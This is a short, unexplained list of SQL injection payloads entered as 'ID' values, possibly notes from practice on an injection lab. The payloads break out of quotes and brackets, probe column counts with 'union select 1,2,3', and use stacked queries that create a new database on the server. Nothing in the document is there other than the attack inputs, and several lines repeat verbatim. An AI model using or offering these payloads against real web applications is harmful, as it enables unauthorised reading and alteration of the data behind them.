ID:1
ID:1\
ID:1 -- 
ID:1" -- 
ID:1' -- 
ID:1’） -- 
ID:1’ -- 
ID:1’
ID:1’ union select 1,2,3 -- 
ID:-1’ union select 1,2,3 -- 
ID:-1" union select 1,2,3 -- 
ID:-1") union select 1,2,3 -- 
ID:-1")) union select 1,2,3 -- 
ID:-1') union select 1,2,3 -- 
ID:1
ID:1
ID:1;create database sq default charset utf8; -- -
ID:1;create database sq default charset utf8; -- -
ID:1;create database sq default charset utf8; -- -
ID:1;create database sq default charset utf8 -- 
ID:1;create database sq default charset utf8 -- 
ID:1;create database sq default charset utf8 -- 
ID:1;create database sq default charset utf8 -- 
ID:1;create database sq default charset utf8; --
